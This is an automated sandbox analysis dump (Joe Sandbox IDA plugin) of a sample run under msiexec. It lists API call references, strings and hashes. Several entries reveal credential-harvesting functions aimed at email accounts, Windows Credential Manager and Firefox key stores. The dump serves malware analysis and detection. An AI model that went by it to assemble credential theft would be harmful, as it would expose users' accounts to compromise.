                      • Snapshot File: hcaresult_13_2_400000_msiexec.jbxd
                      Similarity
                      • API ID: CapsDeviceMetricsSystemWindow$MoveRectRelease
                      • String ID:
                      • API String ID: 1999381814-0
                      • Opcode ID: 5011a2be71f5844cc92965472a983066776558f1b2f7244de85e539227eebf35
                      • Instruction ID: 22bb5f5faf33eb927601db2df5736372c6ae1ca5e65390263d5238b88a5d6584
                      • Opcode Fuzzy Hash: 5011a2be71f5844cc92965472a983066776558f1b2f7244de85e539227eebf35
                      • Instruction Fuzzy Hash: C611A536E00219AFDF008FF9DC49BAE7FB9EB44311F040175EE05E3290DA70A8418A90
                      APIs
                      Strings
                      Memory Dump Source
                      • Source File: 0000000D.00000002.2623560717.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_13_2_400000_msiexec.jbxd
                      Similarity
                      • API ID: memcpymemset
                      • String ID: abort due to ROLLBACK$out of memory$statement aborts at %d: [%s] %s$string or blob too big$unknown error
                      • API String ID: 1297977491-3883738016
                      • Opcode ID: 5be73647a144ebf5748a75f3c436a574a9202e5f864b3081d31fa7a4dfb760c6
                      • Instruction ID: e5ed660087d787d4baabea17299805ba1702756b87ddf288a6169370bd8562d9
                      • Opcode Fuzzy Hash: 5be73647a144ebf5748a75f3c436a574a9202e5f864b3081d31fa7a4dfb760c6
                      • Instruction Fuzzy Hash: FA128D75A00629DFCB14DF68E480AADBBB1BF08314F65409BE945AB341D738F981CF99
                      APIs
                        • Part of subcall function 00449550: memset.MSVCRT ref: 0044955B
                        • Part of subcall function 00449550: memset.MSVCRT ref: 0044956B
                        • Part of subcall function 00449550: memcpy.MSVCRT(?,?,?,00000000,?,?,00000000,00000000,?,00000000), ref: 004495C8
                        • Part of subcall function 00449550: memcpy.MSVCRT(?,?,?,?,?,00000000,00000000,?,00000000), ref: 00449616
                      • memcpy.MSVCRT(?,?,00000040), ref: 0044972E
                      • memcpy.MSVCRT(?,?,00000004,00000000), ref: 0044977B
                      • memcpy.MSVCRT(?,?,00000040), ref: 004497F6
                        • Part of subcall function 00449260: memcpy.MSVCRT(00000001,00449392,00000040,?,?,?,00449392,?,?,?,?,004497AE,?,?,?,00000000), ref: 00449291
                        • Part of subcall function 00449260: memcpy.MSVCRT(00000001,00449392,00000008,?,?,?,00449392,?,?,?,?,004497AE,?,?,?,00000000), ref: 004492DD
                      • memcpy.MSVCRT(?,?,00000000), ref: 00449846
                      • memcpy.MSVCRT(?,?,00000020,?,?,?,?,00000000), ref: 00449887
                      • memcpy.MSVCRT(00000000,?,00000020,?,?,?,?,?,?,?,00000000), ref: 004498B8
                      Strings
                      Memory Dump Source
                      • Source File: 0000000D.00000002.2623560717.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_13_2_400000_msiexec.jbxd
                      Similarity
                      • API ID: memcpy$memset
                      • String ID: gj
                      • API String ID: 438689982-4203073231
                      • Opcode ID: 832627842ba8dc90b88f641ae0f393e23f8c73a82c86ca3b23e3764f0db7e7b3
                      • Instruction ID: 4698d9130898d2a28bd34890c38a7d1df91d0c58a43dc6add7b2b2ec2d892026
                      • Opcode Fuzzy Hash: 832627842ba8dc90b88f641ae0f393e23f8c73a82c86ca3b23e3764f0db7e7b3
                      • Instruction Fuzzy Hash: AB71C9B35083448BE310EF65D88069FB7E9BFD5344F050A2EE98997301E635DE09C796
                      APIs
                      Strings
                      Memory Dump Source
                      • Source File: 0000000D.00000002.2623560717.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_13_2_400000_msiexec.jbxd
                      Similarity
                      • API ID: __aulldvrm$__aullrem
                      • String ID: -$-x0$0123456789ABCDEF0123456789abcdef
                      • API String ID: 643879872-978417875
                      • Opcode ID: b74aa8b09285f319ac94010cbb77161464d88d468cab547f1369814aecdf9254
                      • Instruction ID: 9a4dcd4671c0eaaf570ced65c0a394ff57d12b60ca94b612a12fd923c93321e5
                      • Opcode Fuzzy Hash: b74aa8b09285f319ac94010cbb77161464d88d468cab547f1369814aecdf9254
                      • Instruction Fuzzy Hash: 09618C315083819FD7218F2886447ABBBE1AFC6704F18495FF8C4D7352D3B8C9998B4A
                      APIs
                      • GetDlgItem.USER32(?,000003E9), ref: 00405827
                      • SendMessageA.USER32(00000000,00001009,00000000,00000000), ref: 00405840
                      • SendMessageA.USER32(?,00001036,00000000,00000026), ref: 0040584D
                      • SendMessageA.USER32(?,0000101C,00000000,00000000), ref: 00405859
                      • memset.MSVCRT ref: 004058C3
                      • SendMessageA.USER32(?,00001019,?,?), ref: 004058F4
                      • SetFocus.USER32(?), ref: 00405976
                      Memory Dump Source
                      • Source File: 0000000D.00000002.2623560717.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_13_2_400000_msiexec.jbxd
                      Similarity
                      • API ID: MessageSend$FocusItemmemset
                      • String ID:
                      • API String ID: 4281309102-0
                      • Opcode ID: 1e065b1851f46eedf46acd576a64098092c66e4320400e0dd2798a55d04b3de4
                      • Instruction ID: c72ca3e99ea405196032a5824f130882485a5617ada8e3d881518c79e7018221
                      • Opcode Fuzzy Hash: 1e065b1851f46eedf46acd576a64098092c66e4320400e0dd2798a55d04b3de4
                      • Instruction Fuzzy Hash: 4241F8B5900209AFDB20DF94DC81EAEBBB9EF04358F1440AAE908B7291D7759E50DF94
                      APIs
                        • Part of subcall function 00406D33: strlen.MSVCRT ref: 00406D40
                        • Part of subcall function 00406D33: WriteFile.KERNEL32(?,?,00000000,?,00000000,?,?,0040AB7D,?,<item>), ref: 00406D4D
                      • _mbscat.MSVCRT ref: 0040A8FF
                      • sprintf.MSVCRT ref: 0040A921
                      Strings
                      Memory Dump Source
                      • Source File: 0000000D.00000002.2623560717.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_13_2_400000_msiexec.jbxd
                      Similarity
                      • API ID: FileWrite_mbscatsprintfstrlen
                      • String ID: &nbsp;$<td bgcolor=#%s nowrap>%s$<td bgcolor=#%s>%s$<tr>
                      • API String ID: 1631269929-4153097237
                      • Opcode ID: 1edff87013eeafc9988ac017b7f9a6f14c9cca9b6a50fb5f6e60c21e7938a174
                      • Instruction ID: 568bce87a3ef0860ab630a318aded4c5cbf938598f8cce33e7c60ad495c5b4cb
                      • Opcode Fuzzy Hash: 1edff87013eeafc9988ac017b7f9a6f14c9cca9b6a50fb5f6e60c21e7938a174
                      • Instruction Fuzzy Hash: 88318F32900208AFDF15DF94C886EDE7BB5FF44314F11416AF911BB2A2D779A951CB84
                      APIs
                      • memset.MSVCRT ref: 0040810E
                        • Part of subcall function 00410B00: RegQueryValueExA.ADVAPI32(?,?,00000000,?,?,?,?,?,00402658,?), ref: 00410B16
                        • Part of subcall function 0040466B: _mbscpy.MSVCRT(?,Cry,?,004039AA), ref: 004046BA
                        • Part of subcall function 00404734: LoadLibraryA.KERNELBASE(?,0040F715,?,00000000), ref: 0040473C
                        • Part of subcall function 00404734: GetProcAddress.KERNEL32(00000000,?), ref: 00404754
                      • WideCharToMultiByte.KERNEL32(00000000,00000000,?,004082A2,?,000000FD,00000000,00000000,?,00000000,004082A2,?,?,?,?,00000000), ref: 004081A9
                      • LocalFree.KERNEL32(?,?,?,?,?,00000000,68147B60,?), ref: 004081B9
                        • Part of subcall function 00410ADD: RegQueryValueExA.ADVAPI32(?,?,00000000,?,00401C6A,?,?,?,?,00401C6A,?,?,?), ref: 00410AF8
                        • Part of subcall function 00406F06: strlen.MSVCRT ref: 00406F0B
                        • Part of subcall function 00406F06: memcpy.MSVCRT(?,00401CA1,00000000,00000000,00401CA1,00000001), ref: 00406F20
                      Strings
                      Memory Dump Source
                      • Source File: 0000000D.00000002.2623560717.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_13_2_400000_msiexec.jbxd
                      Similarity
                      • API ID: QueryValue$AddressByteCharFreeLibraryLoadLocalMultiProcWide_mbscpymemcpymemsetstrlen
                      • String ID: POP3_credentials$POP3_host$POP3_name
                      • API String ID: 524865279-2190619648
                      • Opcode ID: b5524387b823faeaa267b2a2291d9d9c6f1165028c5fc642f3f58ff6b69592da
                      • Instruction ID: 3679de1ec208362151a8ef0ee52fb8317fff865e06d3e7d86d66f539d2f4ec3f
                      • Opcode Fuzzy Hash: b5524387b823faeaa267b2a2291d9d9c6f1165028c5fc642f3f58ff6b69592da
                      • Instruction Fuzzy Hash: 5331507594021DAFDB11DB698C81EEEBB7CEF59304F0040BAF904A3141D6349A458F64
                      APIs
                      Strings
                      Memory Dump Source
                      • Source File: 0000000D.00000002.2623560717.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_13_2_400000_msiexec.jbxd
                      Similarity
                      • API ID: ItemMenu$CountInfomemsetstrchr
                      • String ID: 0$6
                      • API String ID: 2300387033-3849865405
                      • Opcode ID: f43f1b6a3e30ed785ddb3ece00de2359a070e4505b5746840cef8f2021710bea
                      • Instruction ID: cca6cfeb93ac41a34237a001b959014c3c2918908c2e54b2122eb51ea62ba4e3
                      • Opcode Fuzzy Hash: f43f1b6a3e30ed785ddb3ece00de2359a070e4505b5746840cef8f2021710bea
                      • Instruction Fuzzy Hash: CC21AB7240C384AFD710CF61C881A9BB7E8FB89344F44093EF68896292E779DD45CB5A
                      APIs
                      • memset.MSVCRT ref: 004076D7
                      • sprintf.MSVCRT ref: 00407704
                      • strlen.MSVCRT ref: 00407710
                      • memcpy.MSVCRT(00000000,00000000,00000001,00000000,00000000,%s (%s),?,-00000004), ref: 00407725
                      • strlen.MSVCRT ref: 00407733
                      • memcpy.MSVCRT(00000001,-00000004,00000001,-00000004,00000000,00000000,00000001,00000000,00000000,%s (%s),?,-00000004), ref: 00407743
                      Strings
                      Memory Dump Source
                      • Source File: 0000000D.00000002.2623560717.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_13_2_400000_msiexec.jbxd
                      Similarity
                      • API ID: memcpystrlen$memsetsprintf
                      • String ID: %s (%s)
                      • API String ID: 3756086014-1363028141
                      • Opcode ID: 50d505c1ae39098dfc6964a27cb52966afae9057970b4fe69166cd045eca6a26
                      • Instruction ID: 78de9dcc32054867ea7a03e537ad908d86abacfb0a76549c44dff0155c32e653
                      • Opcode Fuzzy Hash: 50d505c1ae39098dfc6964a27cb52966afae9057970b4fe69166cd045eca6a26
                      • Instruction Fuzzy Hash: 741190B2800158AFDB21DF59CC45F99B7ACEF81308F0044A6EA58EB202D275FA15CB98
                      APIs
                      Strings
                      Memory Dump Source
                      • Source File: 0000000D.00000002.2623560717.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_13_2_400000_msiexec.jbxd
                      Similarity
                      • API ID: _mbscat$memsetsprintf
                      • String ID: %2.2X
                      • API String ID: 125969286-791839006
                      • Opcode ID: 9c39481db8383895c35f041d5bf0f4fe872cf2cabc6c5cb5cd8df66f0331d79d
                      • Instruction ID: 3c8f4d0594b8058611f6c647f75597c7a5b0e751fa8f3ee8557cc8ef3b8c8270
                      • Opcode Fuzzy Hash: 9c39481db8383895c35f041d5bf0f4fe872cf2cabc6c5cb5cd8df66f0331d79d
                      • Instruction Fuzzy Hash: 93017072D0436425F721AA659C43BAA779CDB84705F10407FF844B62C1EABCFA444B9E
                      APIs
                      • GetFileSize.KERNEL32(00000000,00000000,?,00000000,ACD,00444265,?,?,*.oeaccount,ACD,?,00000104), ref: 004441B0
                      • ??2@YAPAXI@Z.MSVCRT(00000002,?), ref: 004441C2
                      • SetFilePointer.KERNEL32(00000000,00000002,00000000,00000000,?), ref: 004441D1
                        • Part of subcall function 00407560: ReadFile.KERNEL32(00000000,?,004441E4,00000000,00000000,?,?,004441E4,?,00000000), ref: 00407577
                        • Part of subcall function 00444059: wcslen.MSVCRT ref: 0044406C
                        • Part of subcall function 00444059: ??2@YAPAXI@Z.MSVCRT(00000001,004441FB,00000000,00000000,00000000,?,004441FB,?,00000000), ref: 00444075
                        • Part of subcall function 00444059: WideCharToMultiByte.KERNEL32(00000000,00000000,004441FB,000000FF,00000000,00000001,00000000,00000000,00000000,00000000,00000000,?,004441FB,?,00000000), ref: 0044408E
                        • Part of subcall function 00444059: strlen.MSVCRT ref: 004440D1
                        • Part of subcall function 00444059: memcpy.MSVCRT(?,00000000,004441FB), ref: 004440EB
                        • Part of subcall function 00444059: ??3@YAXPAX@Z.MSVCRT(00000000,004441FB,?,00000000), ref: 0044417E
                      • ??3@YAXPAX@Z.MSVCRT(00000000,?,00000000), ref: 004441FC
                      • CloseHandle.KERNEL32(?), ref: 00444206
                      Strings
                      Memory Dump Source
                      • Source File: 0000000D.00000002.2623560717.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_13_2_400000_msiexec.jbxd
                      Similarity
                      • API ID: File$??2@??3@$ByteCharCloseHandleMultiPointerReadSizeWidememcpystrlenwcslen
                      • String ID: ACD
                      • API String ID: 82305771-620537770
                      • Opcode ID: c50c8069a9a8a0753d3fcb8904f6dc24e57909486b41191e56791defa24a5ab0
                      • Instruction ID: 993b87d0760cedec04f170bc8e4db420e9372e17061e8bf8474e84fbc22352e0
                      • Opcode Fuzzy Hash: c50c8069a9a8a0753d3fcb8904f6dc24e57909486b41191e56791defa24a5ab0
                      • Instruction Fuzzy Hash: 9201D836401248BEF7106F75AC8ED9B7BACEF96368710812BF854971A1DA359C14CA64
                      APIs
                      • memset.MSVCRT ref: 004091EC
                      • sprintf.MSVCRT ref: 00409201
                        • Part of subcall function 0040929C: memset.MSVCRT ref: 004092C0
                        • Part of subcall function 0040929C: GetPrivateProfileStringA.KERNEL32(0045A550,0000000A,0044C52F,?,00001000,0045A448), ref: 004092E2
                        • Part of subcall function 0040929C: _mbscpy.MSVCRT(?,?), ref: 004092FC
                      • SetWindowTextA.USER32(?,?), ref: 00409228
                      • EnumChildWindows.USER32(?,Function_00009164,00000000), ref: 00409238
                      Strings
                      Memory Dump Source
                      • Source File: 0000000D.00000002.2623560717.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_13_2_400000_msiexec.jbxd
                      Similarity
                      • API ID: memset$ChildEnumPrivateProfileStringTextWindowWindows_mbscpysprintf
                      • String ID: caption$dialog_%d
                      • API String ID: 2923679083-4161923789
                      • Opcode ID: 873fb4d128c81b604fb18c2010503b3c06e4abe8b396b72ee5fcb0b2d1fc8e6c
                      • Instruction ID: 6e7d5c99c97eb3a6ca4510ecd50999ddf5df62a663a14868e976e94052726d92
                      • Opcode Fuzzy Hash: 873fb4d128c81b604fb18c2010503b3c06e4abe8b396b72ee5fcb0b2d1fc8e6c
                      • Instruction Fuzzy Hash: ADF09C706442897EFB12DBA0DD06FC57B689708706F0000A6BB48E50D2D6F89D84872E
                      APIs
                      • OpenProcess.KERNEL32(00000410,00000000,00000000,?,?,00000000,?,0040FE66,00000000,?), ref: 004101E6
                      • memset.MSVCRT ref: 00410246
                      • memset.MSVCRT ref: 00410258
                        • Part of subcall function 004100CC: _mbscpy.MSVCRT(?,-00000001), ref: 004100F2
                      • memset.MSVCRT ref: 0041033F
                      • _mbscpy.MSVCRT(?,?,?,00000000,00000118), ref: 00410364
                      • CloseHandle.KERNEL32(?,0040FE66,?), ref: 004103AE
                      Memory Dump Source
                      • Source File: 0000000D.00000002.2623560717.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_13_2_400000_msiexec.jbxd
                      Similarity
                      • API ID: memset$_mbscpy$CloseHandleOpenProcess
                      • String ID:
                      • API String ID: 3974772901-0
                      • Opcode ID: 73ffa1b9b7589030d7e14d736cd79d790de15ef6361b0a20e82543b4428b0de8
                      • Instruction ID: 1856ef5d95eaf0ecdca85a0e0a2b389725ab0ec505974788b48c76207b2fc2b2
                      • Opcode Fuzzy Hash: 73ffa1b9b7589030d7e14d736cd79d790de15ef6361b0a20e82543b4428b0de8
                      • Instruction Fuzzy Hash: FF510D7190021CABDB11DF95DD85ADEBBB8EB48305F1001AAEA19E3241D7759FC0CF69
                      APIs
                      • wcslen.MSVCRT ref: 0044406C
                      • ??2@YAPAXI@Z.MSVCRT(00000001,004441FB,00000000,00000000,00000000,?,004441FB,?,00000000), ref: 00444075
                      • WideCharToMultiByte.KERNEL32(00000000,00000000,004441FB,000000FF,00000000,00000001,00000000,00000000,00000000,00000000,00000000,?,004441FB,?,00000000), ref: 0044408E
                        • Part of subcall function 0044338B: ??2@YAPAXI@Z.MSVCRT(00000020,?,00000000,00000000,0044409F,?,004441FB,?,00000000), ref: 004433A0
                        • Part of subcall function 0044338B: ??2@YAPAXI@Z.MSVCRT(00000020,00000000,00000000,0044409F,?,004441FB,?,00000000), ref: 004433BE
                        • Part of subcall function 0044338B: ??2@YAPAXI@Z.MSVCRT(00000014,00000000,00000000,0044409F,?,004441FB,?,00000000), ref: 004433D9
                        • Part of subcall function 0044338B: ??2@YAPAXI@Z.MSVCRT(00000014,00000000,00000000,0044409F,?,004441FB,?,00000000), ref: 00443402
                        • Part of subcall function 0044338B: ??2@YAPAXI@Z.MSVCRT(00000014,00000000,00000000,0044409F,?,004441FB,?,00000000), ref: 00443426
                      • strlen.MSVCRT ref: 004440D1
                        • Part of subcall function 004434FC: ??3@YAXPAX@Z.MSVCRT(?,?,004440DF), ref: 00443507
                        • Part of subcall function 004434FC: ??2@YAPAXI@Z.MSVCRT(00000001,?,004440DF), ref: 00443516
                      • memcpy.MSVCRT(?,00000000,004441FB), ref: 004440EB
                      • ??3@YAXPAX@Z.MSVCRT(00000000,004441FB,?,00000000), ref: 0044417E
                      Memory Dump Source
                      • Source File: 0000000D.00000002.2623560717.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_13_2_400000_msiexec.jbxd
                      Similarity
                      • API ID: ??2@$??3@$ByteCharMultiWidememcpystrlenwcslen
                      • String ID:
                      • API String ID: 577244452-0
                      • Opcode ID: 577707887b9d7bbd390cae1504d1f2340da0442234304708d55a86593fe8f1d4
                      • Instruction ID: 3a965f982735d3f8f3afa93a9d35b3cc19a0dc4d5d85c2e22613d8d88a70f0fa
                      • Opcode Fuzzy Hash: 577707887b9d7bbd390cae1504d1f2340da0442234304708d55a86593fe8f1d4
                      • Instruction Fuzzy Hash: 00317971800259AFEF21EF61C881ADDBBB4EF84314F0441AAF40863241DB396F85CF58
                      APIs
                        • Part of subcall function 00406F06: strlen.MSVCRT ref: 00406F0B
                        • Part of subcall function 00406F06: memcpy.MSVCRT(?,00401CA1,00000000,00000000,00401CA1,00000001), ref: 00406F20
                      • _strcmpi.MSVCRT ref: 00404518
                      • _strcmpi.MSVCRT ref: 00404536
                      Strings
                      Memory Dump Source
                      • Source File: 0000000D.00000002.2623560717.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_13_2_400000_msiexec.jbxd
                      Similarity
                      • API ID: _strcmpi$memcpystrlen
                      • String ID: imap$pop3$smtp
                      • API String ID: 2025310588-821077329
                      • Opcode ID: 508188f4cfb0bf5cabdc99a14187536ad4414849d830173f76bc96666e9cf368
                      • Instruction ID: 0633fc9c76c4ce8560d4ef140e22cd8797028ee620c68f7eda392c6b656e28f7
                      • Opcode Fuzzy Hash: 508188f4cfb0bf5cabdc99a14187536ad4414849d830173f76bc96666e9cf368
                      • Instruction Fuzzy Hash: 1F21B6B25003199BD711DB25CD42BDBB3F99F90304F10006BE749F7181DB78BB458A88
                      APIs
                      • memset.MSVCRT ref: 0040C02D
                        • Part of subcall function 00408DB6: LoadStringA.USER32(00000000,00000006,?,?), ref: 00408E7F
                        • Part of subcall function 00408DB6: memcpy.MSVCRT(00000000,00000001), ref: 00408EBE
                        • Part of subcall function 00408DB6: _mbscpy.MSVCRT(0045A550,strings,?,<html><head>%s<title>%s</title></head><body>%s <h3>%s</h3>,00403F8E,0044C530), ref: 00408E31
                        • Part of subcall function 00408DB6: strlen.MSVCRT ref: 00408E4F
                        • Part of subcall function 004076B7: memset.MSVCRT ref: 004076D7
                        • Part of subcall function 004076B7: sprintf.MSVCRT ref: 00407704
                        • Part of subcall function 004076B7: strlen.MSVCRT ref: 00407710
                        • Part of subcall function 004076B7: memcpy.MSVCRT(00000000,00000000,00000001,00000000,00000000,%s (%s),?,-00000004), ref: 00407725
                        • Part of subcall function 004076B7: strlen.MSVCRT ref: 00407733
                        • Part of subcall function 004076B7: memcpy.MSVCRT(00000001,-00000004,00000001,-00000004,00000000,00000000,00000001,00000000,00000000,%s (%s),?,-00000004), ref: 00407743
                        • Part of subcall function 004074EA: _mbscpy.MSVCRT(?,?), ref: 00407550
                      Strings
                      Memory Dump Source
                      • Source File: 0000000D.00000002.2623560717.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_13_2_400000_msiexec.jbxd
                      Similarity
                      • API ID: memcpystrlen$_mbscpymemset$LoadStringsprintf
                      • String ID: *.csv$*.htm;*.html$*.txt$*.xml$txt
                      • API String ID: 2726666094-3614832568
                      • Opcode ID: 3e9d9b7b28a717fcfc800dd2ec845bb375d33c23d26fbe9b0f9042070bfcc0ea
                      • Instruction ID: 3f197bb1c4e5ac6b46efc8a66ab6c9b366feab3e355a1f8a4a72ad5c6a94b26c
                      • Opcode Fuzzy Hash: 3e9d9b7b28a717fcfc800dd2ec845bb375d33c23d26fbe9b0f9042070bfcc0ea
                      • Instruction Fuzzy Hash: 21212CB1C002189FDB80EF95D9817DDBBB4AF68314F10417FE648B7281EF385A458B99
                      APIs
                      • memcmp.MSVCRT(-00000001,00456EA0,00000010,00000000,?,00406271,00000000,00000000,00000000,00000000,?), ref: 00406151
                        • Part of subcall function 0040607F: memcmp.MSVCRT(00000000,0040616C,00000004,00000000), ref: 0040609D
                        • Part of subcall function 0040607F: memcpy.MSVCRT(00000268,0000001A,?,00000000), ref: 004060CC
                        • Part of subcall function 0040607F: memcpy.MSVCRT(-00000368,0000001F,00000060,00000268,0000001A,?,00000000), ref: 004060E1
                      • memcmp.MSVCRT(-00000001,password-check,0000000E,00000000,?,00406271,00000000,00000000,00000000,00000000,?), ref: 0040617C
                      • memcmp.MSVCRT(-00000001,global-salt,0000000B,00000000,?,00406271,00000000,00000000,00000000,00000000,?), ref: 004061A4
                      • memcpy.MSVCRT(0000013F,00000000,00000000), ref: 004061C1
                      Strings
                      Memory Dump Source
                      • Source File: 0000000D.00000002.2623560717.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_13_2_400000_msiexec.jbxd
                      Similarity
                      • API ID: memcmp$memcpy
                      • String ID: global-salt$password-check
                      • API String ID: 231171946-3927197501
                      • Opcode ID: 74ab0d982855b40a28d8c39abb951e864b1d3e85596098a6ddf56586a45c45d9
                      • Instruction ID: a9589356fa14544f03300d4f181c1951213ca66e4b0bd31de1399f3a3b520bb8
                      • Opcode Fuzzy Hash: 74ab0d982855b40a28d8c39abb951e864b1d3e85596098a6ddf56586a45c45d9
                      • Instruction Fuzzy Hash: BB01FC70A003446EEF212A128C02B4F37569F50769F014037FE0A782C3E67DD679864D
                      APIs
                      • ??3@YAXPAX@Z.MSVCRT(?,0044418F,004441FB,?,00000000), ref: 00443481
                      • ??3@YAXPAX@Z.MSVCRT(?,?,0044418F,004441FB,?,00000000), ref: 0044349C
                      • ??3@YAXPAX@Z.MSVCRT(?,?,0044418F,004441FB,?,00000000), ref: 004434B2
                      • ??3@YAXPAX@Z.MSVCRT(?,?,0044418F,004441FB,?,00000000), ref: 004434C8
                      • ??3@YAXPAX@Z.MSVCRT(?,?,0044418F,004441FB,?,00000000), ref: 004434DE
                      • ??3@YAXPAX@Z.MSVCRT(?,?,0044418F,004441FB,?,00000000), ref: 004434F4
                      Memory Dump Source
                      • Source File: 0000000D.00000002.2623560717.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_13_2_400000_msiexec.jbxd
                      Similarity
                      • API ID: ??3@
                      • String ID:
                      • API String ID: 613200358-0
                      • Opcode ID: be2380aa8a20d610938c9a348f674ad3e0c214076fbfa607157327dc7182db63
                      • Instruction ID: 2c47959068043e69134c65afad444586b1a09f576c08bcd621988c2a5a0f38ec
                      • Opcode Fuzzy Hash: be2380aa8a20d610938c9a348f674ad3e0c214076fbfa607157327dc7182db63
                      • Instruction Fuzzy Hash: 3C016272E46D7167E2167E326402B8FA358AF40F2BB16010FF80477682CB2CBE5045EE
                      APIs
                      • GetClientRect.USER32(?,?), ref: 004016A3
                      • GetSystemMetrics.USER32(00000015), ref: 004016B1
                      • GetSystemMetrics.USER32(00000014), ref: 004016BD
                      • BeginPaint.USER32(?,?), ref: 004016D7
                      • DrawFrameControl.USER32(00000000,?,00000003,00000008), ref: 004016E6
                      • EndPaint.USER32(?,?), ref: 004016F3
                      Memory Dump Source
                      • Source File: 0000000D.00000002.2623560717.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_13_2_400000_msiexec.jbxd
                      Similarity
                      • API ID: MetricsPaintSystem$BeginClientControlDrawFrameRect
                      • String ID:
                      • API String ID: 19018683-0
                      • Opcode ID: 41a9f68717181b3a98dd3cb882205833d46fa89c93d8a9d4005197e1a3202613
                      • Instruction ID: cf01e476fd02228c824cf2568a7310e823bc3a91870265851f050ef0b1242b16
                      • Opcode Fuzzy Hash: 41a9f68717181b3a98dd3cb882205833d46fa89c93d8a9d4005197e1a3202613
                      • Instruction Fuzzy Hash: 81012C76900218AFDF44DFE4DC849EE7B79FB45301F040569EA11AA1A4DAB0A904CB50
                      APIs
                      • memset.MSVCRT ref: 0040644F
                      • memcpy.MSVCRT(?,00000060,?,?,00000000,?), ref: 00406462
                      • memcpy.MSVCRT(?,00000060,?,?,?,?,?,00000000,?), ref: 00406475
                        • Part of subcall function 00404888: memset.MSVCRT ref: 004048C2
                        • Part of subcall function 00404888: memset.MSVCRT ref: 004048D6
                        • Part of subcall function 00404888: memset.MSVCRT ref: 004048EA
                        • Part of subcall function 00404888: memcpy.MSVCRT(?,00406667,?,?,00000000,000000FF,?,00000000,000000FF,?,00000000,000000FF,?,?,?), ref: 004048FC
                        • Part of subcall function 00404888: memcpy.MSVCRT(?,00406667,?,?,00406667,?,?,00000000,000000FF,?,00000000,000000FF,?,00000000,000000FF,?), ref: 0040490E
                      • memcpy.MSVCRT(?,?,00000014,?,00000040,00406667,00000060,?,?,?,00000040,00406667,?,?,?), ref: 004064B9
                      • memcpy.MSVCRT(?,00000060,?,?,?,?,?,?,?,?,?,?,?,00000000,?), ref: 004064CC
                      • memcpy.MSVCRT(?,?,00000014,?,00000040,00406667,?,?,?,?,?,?,?,?,?), ref: 004064F9
                      • memcpy.MSVCRT(?,?,00000014,?,?,?,?,?,?,?,?,?), ref: 0040650E
                        • Part of subcall function 00406286: memcpy.MSVCRT(?,?,00000008,?,?,?,?,?), ref: 004062B2
                      Memory Dump Source
                      • Source File: 0000000D.00000002.2623560717.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_13_2_400000_msiexec.jbxd
                      Similarity
                      • API ID: memcpy$memset
                      • String ID:
                      • API String ID: 438689982-0
                      • Opcode ID: d6e541f26a2e21c8c6d6048cbe16156117454f978ff945f7822072589e58f8d2
                      • Instruction ID: e4a864fa4e69ec142fe4fd7b7713e32d962165e503c4b70a0fc0dcfbb4c29d3a
                      • Opcode Fuzzy Hash: d6e541f26a2e21c8c6d6048cbe16156117454f978ff945f7822072589e58f8d2
                      • Instruction Fuzzy Hash: 41415FB290054DBEEB51DAE9CC41EEFBB7CAB48344F004476F708F7151E634AA498BA5
                      APIs
                        • Part of subcall function 0040466B: _mbscpy.MSVCRT(?,Cry,?,004039AA), ref: 004046BA
                        • Part of subcall function 004045DB: LoadLibraryA.KERNEL32(advapi32.dll,?,0040F708,?,00000000), ref: 004045E8
                        • Part of subcall function 004045DB: GetProcAddress.KERNEL32(00000000,CredReadA), ref: 00404601
                        • Part of subcall function 004045DB: GetProcAddress.KERNEL32(?,CredFree), ref: 0040460D
                        • Part of subcall function 004045DB: GetProcAddress.KERNEL32(?,CredDeleteA), ref: 00404619
                        • Part of subcall function 004045DB: GetProcAddress.KERNEL32(?,CredEnumerateA), ref: 00404625
                        • Part of subcall function 004045DB: GetProcAddress.KERNEL32(?,CredEnumerateW), ref: 00404631
